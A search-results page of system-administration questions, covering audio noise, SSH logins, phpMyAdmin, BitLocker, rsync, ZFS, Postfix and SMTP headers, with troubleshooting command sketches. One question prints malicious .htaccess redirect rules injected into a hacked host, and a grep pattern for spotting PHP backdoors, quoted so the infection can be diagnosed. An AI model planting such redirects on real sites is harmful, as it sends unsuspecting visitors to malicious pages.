Search Results

Search found 20946 results on 838 pages for 'at command'.


  • Hearing a clicking noise from soundcard all the time

    - by Mehrdad
    I have installed Fedora 17 on my laptop. A few days ago I updated my Fedora packages (but did not upgrade the release). I shut down the computer, and since the next time I turned it on I have been hearing a constant clicking noise from the speakers. Even when I plug my headphones in, I hear the noise through them. I searched the internet and found the following shell commands:

        su -c 'echo "options snd_hda_intel power_save=0" > /etc/modprobe.d/snd_hda_intel.conf'
        su -c 'echo 0 > /sys/module/snd_hda_intel/parameters/power_save'

    I tried them, but they didn't work. Here is the part of the lspci output related to my sound card:

        00:1b.0 Audio device: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller (rev 03)

    I should add that the sound card is working and I can play audio files; I hear the sound and the noise simultaneously. Everything is fine in Windows XP, which is also installed on this laptop. Could this be related to the sound card driver? If so, how can I revert it to the previous version?
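
    Since snd_hda_intel ships with the kernel, reverting the driver generally means rolling back the update or booting the previous kernel. A minimal sketch of how one might do that with yum's transaction history (the transaction ID is a placeholder; pick the real one from the listing):

        # list recent transactions and find the update that preceded the noise
        sudo yum history list
        # undo that transaction (replace 42 with the real ID)
        sudo yum history undo 42
        # or check which kernels are installed and boot the older one from GRUB
        rpm -q kernel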


  • Starting programs from terminal then exiting terminal exits started programs?

    - by sherrellbc
    I was really unsure how to phrase the question title. What I mean is that when I use the terminal to start a program, closing the terminal usually also exits the programs started from it. This makes sense from a hierarchical standpoint: the terminal is the parent process, it spawns child processes, and halting the parent halts the children as well. However, I've noticed this is not always the case. For example, I downloaded the Sublime Text editor and created a symlink to it in PATH. I can start it by issuing a sublime command from the terminal, and closing the terminal afterwards does nothing to Sublime. Other times, though, the child process is closed along with the terminal, or it hangs and causes problems.

    tl;dr: Is it always the case that child processes are closed when the parent process exits? And if so, is there a way to start a program from the terminal and then close the terminal without exiting the started process? The whole point here is to start programs from the terminal so I do not overly populate my desktop with symlinks.
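
    Whether a child survives depends on the SIGHUP the shell sends its jobs when the terminal closes. A minimal sketch of the usual ways to detach a program, using sublime as the example command:

        # start immune to hangups, with output redirected away from the terminal
        nohup sublime >/dev/null 2>&1 &

        # or detach a job that is already running in the background
        sublime &
        disown

        # or start it in a fresh session, fully divorced from the terminal
        setsid sublime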


  • Strange ssh login

    - by Hikaru
    I am running a Debian server and I have received a strange email warning about an SSH login. It says that the user mail logged in over SSH from a remote address. Environment info:

        USER=mail
        SSH_CLIENT=92.46.127.173 40814 22
        MAIL=/var/mail/mail
        HOME=/var/mail
        SSH_TTY=/dev/pts/7
        LOGNAME=mail
        TERM=xterm
        PATH=/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games
        LANG=en_US.UTF-8
        SHELL=/bin/sh
        KRB5CCNAME=FILE:/tmp/krb5cc_8
        PWD=/var/mail
        SSH_CONNECTION=92.46.127.173 40814 my-ip-here 22

    I looked in /etc/shadow and found that no password is set for mail:

        mail:*:15316:0:99999:7:::

    I found these lines for the login in auth.log:

        Jun 3 02:57:09 gw sshd[2090]: pam_winbind(sshd:auth): getting password (0x00000388)
        Jun 3 02:57:09 gw sshd[2090]: pam_winbind(sshd:auth): pam_get_item returned a password
        Jun 3 02:57:09 gw sshd[2091]: pam_winbind(sshd:auth): user 'mail' granted access
        Jun 3 02:57:09 gw sshd[2091]: Accepted password for mail from 92.46.127.173 port 45194 ssh2
        Jun 3 02:57:09 gw sshd[2091]: pam_unix(sshd:session): session opened for user mail by (uid=0)
        Jun 3 02:57:10 gw CRON[2051]: pam_unix(cron:session): session closed for user root

    There are also lots of auth failures for this user, and no lines with a COMMAND string for it. Nothing was found with rkhunter or by inspecting processes with ps aux, and no suspicious connections show up in netstat (as far as I can see). Can anyone tell me how this is possible and what else should be done? Thanks in advance.
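
    The auth.log lines show pam_winbind, not pam_unix, granting access, so the * in /etc/shadow is not what authenticated this login; winbind validated the password against a domain. A minimal sketch of containment steps while that is investigated (paths assume the Debian layout shown in the post):

        # block interactive logins for the mail user
        sudo usermod -s /usr/sbin/nologin mail
        # check for planted SSH keys in its home directory (HOME=/var/mail here)
        sudo ls -la /var/mail/.ssh/ 2>/dev/null
        # see where winbind is wired into SSH authentication
        grep -r winbind /etc/pam.d/ /etc/nsswitch.conf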


  • What can be the reason for a phpMyAdmin login not working (no reaction at all on submit)?

    - by Ivan
    When I open http://localhost/phpmyadmin/, enter "root" as the user name along with my MySQL root password, and press Go, Firefox offers to download an index.php file (of zero length), while Opera 11 says "Connection closed by remote server".

    Following recommendations, I removed all packages related to phpMyAdmin, PHP, MySQL and Apache and then reinstalled them step by step (instead of just issuing apt-get install phpmyadmin and relying on the system to pull in the whole LAMP stack via dependencies, as I had done before). The only change I got was that Firefox stopped offering to download index.php - now when I press Go to submit my password, there is no visible reaction at all.

    What may the reason be, and how can I fix it? I use up-to-date Xubuntu 11.04. Reinstalling the whole LAMP stack and phpMyAdmin did not help, and neither did removing AppArmor. I tried SQLBuddy instead, and it has exactly the same problem, so I think the problem is not in phpMyAdmin but in MySQL, Apache or something else. MySQL seems to work if I access it from the command line. Apache and PHP also seem to work, as the phpMyAdmin login page displays correctly.
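
    A zero-length response on login but a working login page is the classic signature of PHP dying mid-request, and the Apache error log usually says so explicitly. A minimal sketch of the checks, assuming Ubuntu's default paths:

        # watch the error log while reproducing the failed login
        sudo tail -f /var/log/apache2/error.log
        # confirm the MySQL extension is actually loaded into PHP
        php -m | grep -i mysql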


  • Using Windows Explorer, how to find file names starting with a dot (period), in 7 or Vista?

    - by Chris W. Rea
    I've got a MacBook laptop in the house, and when Mac OS X copies files over the network, it often brings along hidden "dot-files". For instance, if I copy "SomeUtility.zip", a hidden ".SomeUtility.zip" file is copied along with it. I consider these OS X dot-files useless turds of data as far as the rest of my network is concerned, and don't want to leave them on my Windows file server.

    Let's assume these dot-files will continue to appear; consider getting OS X to stop creating them in the first place to be another question altogether. Rather: how can I use Windows Explorer to find files that begin with a dot/period? I'd like to periodically search my file server and blow them away. I tried searching for files matching ".*", but that yielded - not unexpectedly - all files and folders.

    Is there a way to enter more specific search criteria when searching in Windows Explorer? I'm referring to the search box that appears in the upper-right corner of an Explorer window. Please tell me there is a way to escape my query to do what I want. (Failing that, I know I can map a drive letter, drop into a Cygwin prompt and use the UNIX find command, but I'd prefer a shiny easy way.)
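
    Failing a native Explorer query, the Cygwin fallback mentioned above is a one-liner. A minimal sketch, assuming the server share is mapped to drive Z: (adjust the path):

        # list every dot-file under the mapped drive
        find /cygdrive/z -type f -name '.*'
        # once the listing looks right, delete them
        find /cygdrive/z -type f -name '.*' -delete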


  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting account of one of my clients. The issue is as follows: every 2 hours or so, the .htaccess file and all other .htaccess files get modified. At the top of each file these lines are added:

        <IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
        RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
        </IfModule>

    And at the bottom:

        ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
        ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8

    The main problem is that I'm not root on the server and cannot sudo, as this is shared hosting with hundreds of websites. Typical useful commands like dmesg, lsof, dtrace, chattr and many others are not available to me because I'm not root. I can't find out who is modifying the .htaccess files - how do I get that information? My guess is that some PHP script is changing them, called from outside via command and control. This seems related to: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?
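
    Without root, the timestamps on the account's own files are still visible, and the injector is very often a PHP backdoor inside the same account. A minimal sketch of narrowing it down from the account's web root (the two-hour window matches the rewrite cadence described above):

        # PHP files changed in the last two hours
        find . -name '*.php' -mmin -120 -ls
        # files newer than the most recently rewritten .htaccess
        find . -newer .htaccess -type f
        # the usual obfuscation primitives found in injected backdoors
        grep -rl --include='*.php' -E 'base64_decode|eval *\(' .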


  • Chef bash resource not executing as specified user

    - by Arthur Maltson
    I'm writing a Chef cookbook to install Hubot. In the recipe, I do the following:

        bash "install hubot" do
          user hubot_user
          group hubot_group
          cwd install_dir
          code <<-EOH
            wget https://github.com/downloads/github/hubot/hubot-#{node['hubot']['version']}.tar.gz && \
            tar xzvf hubot-#{node['hubot']['version']}.tar.gz && \
            cd hubot && \
            npm install
          EOH
        end

    However, when I run chef-client on the server installing the cookbook, I get a permission denied writing to the directory of the user that runs chef-client, not the hubot user. For some reason, npm is trying to run under the wrong user, not the user specified in the bash resource.

    I am able to run sudo su - hubot -c "npm install /usr/local/hubot/hubot" manually, and this gets the result I want (installs hubot as the hubot user). However, it seems chef-client isn't executing the command as the hubot user. Below you'll find the chef-client output. Thank you in advance.

        Saving to: `hubot-2.1.0.tar.gz'
        0K ...... 100% 563K=0.01s
        2012-01-23 12:32:55 (563 KB/s) - `hubot-2.1.0.tar.gz' saved [7115/7115]
        npm ERR! Could not create /home/<user-chef-client-uses>/.npm/log/1.2.0/package.tgz
        npm ERR! Failed creating the tarball.
        npm ERR! couldn't pack /tmp/npm-1327339976597/1327339976597-0.13104878342710435/contents/package to /home/<user-chef-client-uses>/.npm/log/1.2.0/package.tgz
        npm ERR! error installing [email protected] Error: EACCES, permission denied '/home/<user-chef-client-uses>/.npm/log'
        ...
        npm not ok
        ---- End output of "bash"  "/tmp/chef-script20120123-25024-u9nps2-0" ----
        Ran "bash"  "/tmp/chef-script20120123-25024-u9nps2-0" returned 1
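
    The failing path (/home/<user-chef-client-uses>/.npm) suggests the bash resource switches the uid but does not reset HOME, so npm keeps writing its cache into the invoking user's home directory. A minimal sketch of the workaround implied by the manual command that works, wrapping the install in a login shell so su sets up the environment (paths are the ones from the post):

        # run npm with hubot's full login environment, not just its uid
        sudo su - hubot -c "cd /usr/local/hubot/hubot && npm install"

    Alternatively, Chef's script resources accept an environment attribute through which HOME can be set explicitly alongside user.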


  • Having trouble with a workaround for booting from a USB stick, using GRUB and a minimal Linux kernel to load USB drivers

    - by s hanley
    I'm trying to boot from a USB stick. I formatted it to FAT32, and later to ext2, and installed DSL on it using UNetbootin, and later using the USB install guide on the DSL wiki (http://www.damnsmalllinux.org/wiki/index.php/Install_to_USB_From_within_Linux). The BIOS doesn't have a setting for booting from USB. GRUB doesn't "see" the USB drive when I use the root and find commands explained in http://www.damnsmalllinux.org/wiki/index.php/USB_Booting. This happens even when I set boot from floppy at the top of the boot order. However, my USB keyboard is recognised by the BIOS and by GRUB. How can it recognise the keyboard but not the USB drive? Also, the USB LED does flash even before GRUB starts up, so surely something must be happening USB-wise?

    I am now following an Ubuntu guide to booting from a USB stick, using a HDD-based, minimal Linux kernel to supply the USB drivers. But I'm having difficulty adapting it to other OSes (Slax/DSL/Aptosid). I believe I have to alter the initrd.gz file to include USB drivers and then copy that file along with vmlinuz to a partition on my HDD. But what is the GRUB command for the kernel line supposed to look like? From the Ubuntu example it's:

        title USB FLASH DRIVE
        root (hd0,6)
        kernel /boot/usb-boot/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper noprompt cdrom-detect/try-usb=true persistent
        initrd /boot/usb-boot/initrd.lz
        boot

    Should mine just be:

        title USB FLASH DRIVE
        root (hd0,6)
        kernel /boot/usb-boot/vmlinuz cdrom-detect/try-usb=true
        initrd /boot/usb-boot/initrd.lz
        boot
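
    For the initrd side of this, Debian-style systems can regenerate an initramfs with the USB storage driver baked in, which is the piece the minimal-kernel trick depends on. A minimal sketch, assuming initramfs-tools is what generates the initrd on the helper system (DSL and Slax use their own initrd formats, so this applies to the Ubuntu-based variant):

        # have the generated initramfs include the USB storage driver
        echo usb-storage | sudo tee -a /etc/initramfs-tools/modules
        sudo update-initramfs -u
        # copy the kernel and the new initrd to where the GRUB stanza expects them
        sudo cp /boot/vmlinuz-$(uname -r) /boot/usb-boot/vmlinuz
        sudo cp /boot/initrd.img-$(uname -r) /boot/usb-boot/initrd.lz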


  • Cannot write to directory after taking ownership

    - by jeff charles
    I had a directory on an internal hard drive that was created in an old Windows 7 install. After re-installing my operating system, when I try to create a new directory inside that directory, I get an Access Denied message. This isn't a protected directory, just a random directory I created at the drive root (that drive was not the C: drive in either install).

    I tried to take ownership by opening the folder properties, going to the Security tab, clicking Advanced, going to the Owner tab, clicking Edit, selecting my user account, checking "Replace owner on subcontainers and objects", and clicking Apply. There were no error messages, and I closed the dialogs. I rebooted, checked the owner on that folder and a couple of subfolders, and it appears to be set correctly. I am still getting an Access Denied message, however, when trying to create a directory in it.

    I've also tried using attrib -R . in an admin command prompt to remove any possible read-only attribute inside the directory, but I am still unable to create a directory from a non-admin prompt (it does work in an admin prompt). Is there anything I can do to get write access to that folder and its contents in a non-elevated context without disabling UAC?


  • Enable BitLocker and save the key to a share

    - by user273694
    I have searched all over the web but cannot find a complete answer to this: how to enable BitLocker on a laptop with TPM, and store a file with the BitLocker recovery key and TPM password, by USING THE manage-bde command-line tool. The file should be the same as the one created by the BitLocker manager UI. I DO NOT want to save to AD. The same question was asked here but was not answered correctly. The goal is to write a script to be used with an endpoint manager. I have tried the following:

        manage-bde -on C:

    Works fine, but does not create or save a key.

        manage-bde -on C: -rk C:\myfolder\
        manage-bde -on C: -RecoveryKey C:\myfolder\ -rp

    The output from the last two methods states that a key has been saved to C:\myfolder and so on, but that is not the case. It also says that I have to:

    1. Save the password in a secure location.
    2. Insert a USB flash drive with an external key file into the computer.
    3. Restart and run a hardware test.
    4. Type "manage-bde -status" to check whether the hardware test succeeded.

    After a restart, I get an error saying that BitLocker could not be enabled because the BitLocker startup key or recovery password could not be found on the USB device.... C: was not encrypted. Why am I asked to insert a USB drive? I simply want to encrypt the hard drive and save the recovery information to a file automatically. Is that too much to ask? Help please!


  • Macports install of ack doesn't create correct executable

    - by user1664196
    I am trying to install the p5-app-ack port from MacPorts, but it seems it doesn't create a /opt/local/bin/ack binary at the end:

        $ sudo port search *app-ack
        Password:
        p5-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories
        p5.8-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories
        p5.10-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories
        p5.12-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories
        p5.14-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories
        p5.16-app-ack @1.960.0 (perl)
            A grep replacement that ignores .svn/CVS/blib directories

        Found 6 ports.

        $ perl --version
        This is perl 5, version 12, subversion 4 (v5.12.4) built for darwin-thread-multi-2level
        Copyright 1987-2010, Larry Wall
        Perl may be copied only under the terms of either the Artistic License or the
        GNU General Public License, which may be found in the Perl 5 source kit.
        Complete documentation for Perl, including FAQ lists, should be found on this
        system using "man perl" or "perldoc perl". If you have access to the Internet,
        point your browser at http://www.perl.org/, the Perl Home Page.

        $ sudo port install p5-app-ack
        --->  Computing dependencies for p5-app-ack
        --->  Cleaning p5-app-ack
        --->  Updating database of binaries: 100.0%
        --->  Scanning binaries for linking errors: 35.0%
        --->  No broken files found.

        $ ls /opt/local/bin/ac*
        /opt/local/bin/ack-5.12
        /opt/local/bin/aclocal
        /opt/local/bin/aclocal-1.12
        /opt/local/bin/activation-client
        /opt/local/bin/acyclic

        $ which ack
        $ ack
        -bash: ack: command not found

    Update: if I then try to install p5.12-app-ack afterwards, I get:

        $ sudo port install p5.12-app-ack
        Password:
        --->  Computing dependencies for p5.12-app-ack
        --->  Cleaning p5.12-app-ack
        --->  Scanning binaries for linking errors: 100.0%
        --->  No broken files found.
        $
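
    The ls output shows a binary did get installed, just under a Perl-versioned name (ack-5.12), which is MacPorts' convention for per-Perl-version ports. A minimal sketch of a workaround, assuming ack-5.12 is the App::Ack executable:

        # give the versioned binary an unversioned name on the PATH
        sudo ln -s /opt/local/bin/ack-5.12 /opt/local/bin/ack
        hash -r        # clear bash's cached lookup of "ack"
        ack --version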


  • Ubuntu + Win7: disk error, press any key to restart

    - by Siddharth
    Apparently none of the solutions in other posts and forums worked for me. For some reason I decided to remove Ubuntu from my hard disk drive. My partition table (presently):

        (/dev/sda1)    (fat32)  900 MiB      (MBR, I suppose)
        (/dev/sda2)    (ntfs)   70 GiB       (Windows 7)
        (/dev/sda3)    (ntfs)   314.88 GiB   (personal file storage)
        (/dev/sda4)    (ext4)   80 GiB       (Ubuntu 13.04)
        (unallocated)           1.31 MiB

    So, after moving (cut-paste) everything (for backup) from the FAT32 partition using Windows 7, I booted into Ubuntu and copied the remaining 3 files (hidden in the Windows 7 file explorer) - bootmgr, bootsect.bak, and one more which I do not remember. TERRIBLE MISTAKE.

    After this I again booted into Windows and deleted the ext4 partition, formatted it to NTFS, and shut down the PC. Then I put in a Windows 7 bootable USB and, using the command prompt, entered bootrec /fixmbr and bootrec /fixboot. Restarting showed me GRUB; choosing Windows 7 showed me "Disk Error. Press any key to restart."

    I also installed a fresh Windows 7 installation on the 80 GiB partition, expecting a Windows legacy bootloader with two Windows 7 options, but that did not work either. Then I used an Ubuntu live USB to get back to the present configuration (above), since all methods to restore the MBR failed. I copied back the FAT32 partition's backup files but couldn't copy those 3 files; somehow they had been recreated and were non-replaceable.

    I do not want to format the Windows 7 partition for a fresh install. I have used Boot-Repair; its "Restore MBR" option brings me back to "Disk Error..." without even going through GRUB, so I reinstalled GRUB and I'm able to boot into Ubuntu. The GRUB menu shows the Windows 7 option as "Windows 7 (loader) (on /dev/sda1)".

        paste.ubuntu.com/5753710
        paste.ubuntu.com/5775999


  • Massive number of context switches on ksoftirqd

    - by Pace
    We have two servers that are grinding to a halt. One is a VM and the other is bare metal. Neither of them is running similar code, but they are on the same network. It appears that an incredible number of context switches are arising from ksoftirqd (which is taking up a lot of CPU).

    vmstat output:

        procs -----------memory---------- ---swap-- -----io---- -system-- -----cpu------
         r  b   swpd   free   buff  cache   si   so    bi    bo    in     cs us sy id wa st
         1  0      0 605092 182496 2637556    0    0     0     0  4177 519187  8 19 73  0  0
         2  0      0 605092 182496 2637556    0    0     0     0  4792 520980  8 19 74  0  0
         3  0      0 605092 182496 2637552    0    0     0     0  2137 659640 18 26 56  0  0
        ...

    pidstat output:

        TCK4-BM-06A:~ # pidstat -w -I 5
        Linux 2.6.32.12-0.7-default (TCK4-BM-06A)  07/02/2012  _x86_64_

        03:03:01 PM       PID   cswch/s nvcswch/s  Command
        03:03:06 PM         1      0.20      0.00  init
        03:03:06 PM         4 386666.27      0.00  ksoftirqd/0
        03:03:06 PM         6      0.60      0.00  ksoftirqd/1
        03:03:06 PM         8 378213.17      0.00  ksoftirqd/2
        03:03:06 PM        10      0.20      0.00  ksoftirqd/3
        03:03:06 PM        12      0.20      0.00  ksoftirqd/4
        03:03:06 PM        26 377115.37      0.00  ksoftirqd/11
        03:03:06 PM        27      1.80      0.00  events/0
        03:03:06 PM        28      1.00      0.00  events/1
        03:03:06 PM        29      1.00      0.00  events/2
        03:03:06 PM        30      1.00      0.00  events/3
        03:03:06 PM        31      0.80      0.00  events/4
        03:03:06 PM        32      0.80      0.00  events/5
        ...

    My initial thought is that, since both are on the same network, something is flooding the network. Is this consistent with the data?
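
    The per-CPU counters in /proc can confirm or rule out the network theory: a flood shows up as the NET_RX row climbing in step with the busy ksoftirqd threads. A minimal sketch of the usual checks (interface name assumed):

        # watch which softirq class is incrementing (NET_RX points at receive traffic)
        watch -d -n1 cat /proc/softirqs
        # map the busy CPUs to an interrupt source / device
        cat /proc/interrupts
        # sample the wire if the NIC is the suspect
        tcpdump -ni eth0 -c 100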


  • Moving a lot of small files between servers using rsync

    - by Adirael
    Hello guys, I'm moving a lot of files (about 2 million) between two servers in different locations using rsync over SSH. It seems to work fine, but I just realised I'm losing some files in the process. I have server 1, with the original data, and server 2, with the copy. Server 1 runs CentOS 5 and server 2 runs Ubuntu 10. I'm doing the transfer from server 2's command line like this:

        rsync -e ssh -avzn usr@server1:/remote/path /local/path

    The first file movement I did using tar, but I didn't think of piping it through ssh, and it failed because the disk on server 1 was almost full, so I transferred it anyway (it was about 200 GB) and got about 80% of the files. Then I piped another tar with the rest of the files (they're in folders - I have 100 folders with about 30 subfolders each, with files inside) and now I have everything on server 2.

    I wanted to be sure, so my two options were getting the md5sum of all the files and checking them, or running an rsync on server 2 against server 1, which is what I did. It picked up some missing stuff, and now it says there's nothing more to do (DRY RUN). But I have at least two files that are missing inside a subfolder. I ran the same rsync on that folder, but it is still a dry run. Am I doing something wrong? Thanks, and sorry for the wall of text.
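
    One thing stands out in the quoted command: -n is rsync's --dry-run flag, which reports what would be transferred without copying anything - and it matches the "(DRY RUN)" marker in the output described. A minimal sketch of a real verification pass (same paths as the post):

        # drop -n, itemize every difference, and compare by checksum rather than size+mtime
        rsync -e ssh -avc --itemize-changes usr@server1:/remote/path /local/path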


  • Can't remove zfs log device from pool

    - by netmano
    I run a FreeBSD 9.0 server with ZFS pool version 28 and ZFS version 5. I had two pools, each with a log on one of an SSD's two partitions. These pools were created on FreeBSD 8.2 with ZFS pool version 15 and ZFS version 4.

    After I upgraded to the new ZFS version, I tried to remove the SSD log device from both pools. Both commands were successful (no error message). The log was removed from one of the pools, but it remained in the other. I shut down the server, removed the SSD physically, and hoped the zpool would forget it. The pool became degraded, as the SSD was missing. I tried the removal again: no error message, but the log device entry is still there.

    After that, to bring the pool online again, I created a file on the root UFS partition and replaced the missing device with this file. That was successful and the pool is online again. However, I still can't remove the log device from the pool. Where should I look for error messages? There is nothing about it in dmesg, and the zfs remove doesn't print any error message either; it seems as if it was successful.
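
    Since the missing device was replaced with a file, the thing to remove now is that file vdev, and for devices that have gone missing zpool remove accepts the vdev's guid in place of a path. A minimal sketch (the pool name, file path and guid are placeholders read from the status output):

        # show the layout, including the replacement file and any missing device's guid
        zpool status tank
        # remove the log vdev by its path (the replacement file) or by guid
        zpool remove tank /root/logfile
        zpool remove tank 1234567890123456789
        # clear residual errors afterwards
        zpool clear tank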


  • Active Directory: Determining DN or OU from login credentials [closed]

    - by Christopher Broome
    I'm updating a PHP login process to leverage Active Directory on a Windows server. The login itself seems pretty straightforward via ldap_bind, but I also want to pull some profile information from the AD server (first name, last name, etc.), which seems to require a proper distinguished name (DN). On the Windows server I can grab this via dsquery user at the command prompt, but is there a way to get the same value in PHP from just the user's login credentials?

    I want to avoid getting a list of hundreds of DNs when on-boarding clients and associating each with one of our users, so any means of determining this programmatically would be preferable. Otherwise, I'll know the domain and host for the request, so I can at least set the DC portions of the DN, but the organizational units (OU) seem to be pretty important for querying data. If I can find some of the root-level OU values associated with the user, I can do an ldap_search and crawl. I browsed through the existing questions and found some similar ones, but nothing that really addressed this, so my apologies if the obvious answer is out there. Thanks for the help.
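
    Once the bind with the user's own credentials succeeds, the DN doesn't have to be known in advance: AD can be searched by login name from the domain root, and the matching entry carries the DN plus the profile attributes. A minimal sketch using the OpenLDAP command-line client (the host, account and base DN are placeholders; PHP's ldap_search takes the same filter against the bound connection):

        # bind as the user, then search the whole domain for their sAMAccountName
        ldapsearch -x -H ldap://dc.example.com \
            -D 'jdoe@example.com' -W \
            -b 'dc=example,dc=com' \
            '(sAMAccountName=jdoe)' dn givenName sn mail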


  • Recent DDE / file open issue with Office 2007 affecting only a few machines, is a Windows Update to blame?

    - by kafka
    All our workstations run Windows 7 Professional 64-bit. It started with one machine, then another, then another couple of machines having a problem accessing Word files locally and on the network. This doesn't happen on my machine, though. Affected users get the error message "There was a problem sending the command to the program". I've Googled for solutions, but none of the answers worked. They suggested deleting certain registry keys, unregistering and reregistering the program for DDE, resetting the way the shell opens .docx files, etc., each to no avail.

    As it affects local files and network shares alike, I believe the problem lies with the clients and not the server, and I'm starting to suspect that a recent Windows Update could have caused this. I've tried comparing the updates on my working machine with an affected machine, but I can't immediately see any major differences. Has anyone else recently encountered this problem? What are the best steps to take to further isolate what could be causing it?


  • Backing up a Windows 7 partition from a MacBook with no OS X

    - by mattcodes
    I have a 3-year-old MacBook with Windows 7 installed on 40 GB and OS X on 40 GB (80 GB HD). I want to remove OS X, as I'm at the limit of the 40 GB on Windows and I have not logged on to Mac OS X since installing Windows 7 (don't flame me). So I want to delete the OS X partition and expand my Windows partition to 80 GB, BUT I would still like to be able to back up my Windows 7 partition regularly (once a week/month). It took a while to set everything up right - not just docs and programs - so when the hard drive dies I want to be able to restore the partition and boot away. (The daily volatile bits I can pull down from Dropbox, and projects from source control.)

    With Mac OS X I could use Winclone, and this worked flawlessly the last time the HD failed, with XP, but in the absence of OS X I will need something else. I'm thinking: can I use a Linux live boot CD along with an external USB hard drive? Boot from the CD and then dd the partition to the USB drive? Which Linux distro live CD should I use? I say dd as if I know what I am talking about (I don't) - is this the best way to back up a partition (when it will be restored to the same hardware as bootable)? What command?
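
    Any mainstream live CD (Ubuntu, SystemRescueCd, Knoppix) ships dd, and a raw image of the partition is enough to restore onto the same hardware. A minimal sketch, assuming the Windows partition is /dev/sda2 and the external drive is mounted at /mnt/backup - verify the device names with fdisk -l first, since dd to the wrong device is destructive:

        # image the partition, compressing on the fly
        sudo dd if=/dev/sda2 bs=4M | gzip > /mnt/backup/win7.img.gz
        # restore later by reversing the direction
        gunzip -c /mnt/backup/win7.img.gz | sudo dd of=/dev/sda2 bs=4M
        # also save the MBR + partition table so a replacement disk can be rebuilt
        sudo dd if=/dev/sda of=/mnt/backup/mbr.bin bs=512 count=1

    ntfsclone (part of ntfs-3g, included on most live CDs) does the same job faster by skipping unused blocks.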


  • postfix test and configuration problem

    - by Woho87
    Hi guys! I installed Postfix using sudo yum install postfix postfix-mysql. I'm a newbie to mail systems, but I have an Amazon EC2 instance with a public DNS name. I used the public DNS name in most cases when I configured main.cf. The public DNS name I have is from Amazon and it is a long string (ec2-123-34-234-677.....amazon.com). This is what I configured in main.cf, replacing example.com with ec2-123-.......amazon.com:

        myhostname = mail.example.com
        mydomain = example.com
        myorigin = $mydomain
        mydestination = example.com, $transport_maps
        local_recipient_maps = $alias_maps $virtual_mailbox_maps unix:passwd.byname
        home_mailbox = Maildir/

    How do I test Postfix? I just want it to send emails from my web application. After typing sudo postfix start over SSH, I tried to test it with telnet localhost 25, but I receive a message that the telnet command cannot be found. I use the Amazon Linux distribution, if you want to know; I use it because it is free. What have I done wrong? Are there any more configurations required? Please help!
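
    The missing telnet is just a missing package on minimal Amazon Linux images; installing it allows a hand-driven SMTP session against the local Postfix. A minimal sketch (addresses are placeholders):

        sudo yum install -y telnet
        telnet localhost 25
        # then type an SMTP dialogue by hand:
        #   HELO localhost
        #   MAIL FROM:<test@localhost>
        #   RCPT TO:<you@example.com>
        #   DATA
        #   Subject: postfix test
        #
        #   it works
        #   .
        #   QUIT
        # and watch the result in the mail log
        sudo tail -f /var/log/maillog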


  • Use old raid drive as boot device without data loss

    - by Gabriel
    There were two disks in software RAID, with /dev/md1 as swap, /dev/md2 as boot and /dev/md3 as an ext4 filesystem. The RAID was disabled by stopping and removing mdadm and then zeroing the superblock on each member partition:

        sudo mdadm --zero-superblock /dev/sda1
        sudo mdadm --zero-superblock /dev/sda2
        sudo mdadm --zero-superblock /dev/sda3

    On the disk that is the first boot device (I don't know if it's relevant), the system type of each partition was set back from fd to 82 or 83 with fdisk, /etc/fstab was updated, changing /dev/mdX to /dev/sdaX, and GRUB was reinstalled on the boot partition (/dev/sda2) with grub-install. But the system won't boot. What else should I do to use this disk as the boot device without reinstalling or losing data? Current output of fdisk:

        Device Boot      Start         End      Blocks   Id  System
        /dev/sda1         2048    33556480    16777216+  82  Linux swap / Solaris
        /dev/sda2   *  33558528    34607104      524288+  83  Linux
        /dev/sda3      34609152  3907027120  1936208984+  83  Linux

    By "it doesn't boot" I mean that it stops in the GRUB console (with the grub> prompt). An ls command there says:

        (hd0) (hd0,msdos3) (hd0,msdos2) (hd0,msdos1) (hd1) (hd1,msdos1)

    It's weird, because hd1 was formatted with ext4...
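
    Landing at the grub> prompt usually means the MBR-stage GRUB can no longer find its configuration - plausible here, since grub-install was pointed at the partition rather than the disk. A minimal sketch of reinstalling to the disk's MBR from a live CD, on Debian-style systems (device names are the ones from the post):

        # mount root and boot, bind the virtual filesystems, and chroot in
        sudo mount /dev/sda3 /mnt
        sudo mount /dev/sda2 /mnt/boot
        for d in /dev /proc /sys; do sudo mount --bind $d /mnt$d; done
        # reinstall GRUB to the whole disk and regenerate its config
        sudo chroot /mnt grub-install /dev/sda
        sudo chroot /mnt update-grub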


  • Correct use of SMTP "Sender" header?

    - by Eric Rath
    Our web application sends email messages to people when someone posts new content. Both sender and recipient have opted in to receiving email messages from our application. When preparing such a message, we set the following SMTP headers:

        FROM: [email protected]
        TO: [email protected]
        SENDER: [email protected]

    We chose to use the author's email address in the FROM header to provide the best experience for the recipient: when they see the message in their mail client, the author is clear. To avoid the appearance of spoofing, we added the SENDER header (with our own company email address) to make it clear that we sent the message on the author's behalf. After reading RFCs 822 and 2822, this seems to be an intended use of the Sender header. Most receiving mail servers seem to handle this well; the message is delivered normally (assuming the recipient mailbox exists, is not over quota, etc.).

    However, when sending a message FROM an address in a domain TO an address in the same domain, some receiving domains reject the message with a response like:

        571 incorrect IP - psmtp (in reply to RCPT TO command)

    I think this means the receiving server only saw that the FROM address was in its own domain, and that the message originated from a server it didn't consider authorized to send messages for that domain. In other words, the receiving server ignored the SENDER header. We have a workaround in place: the web app keeps a list of such domains that seem to ignore the SENDER header, and when the FROM and TO headers are both in such a domain, it sets the FROM header to our own email address instead. But this list requires maintenance.

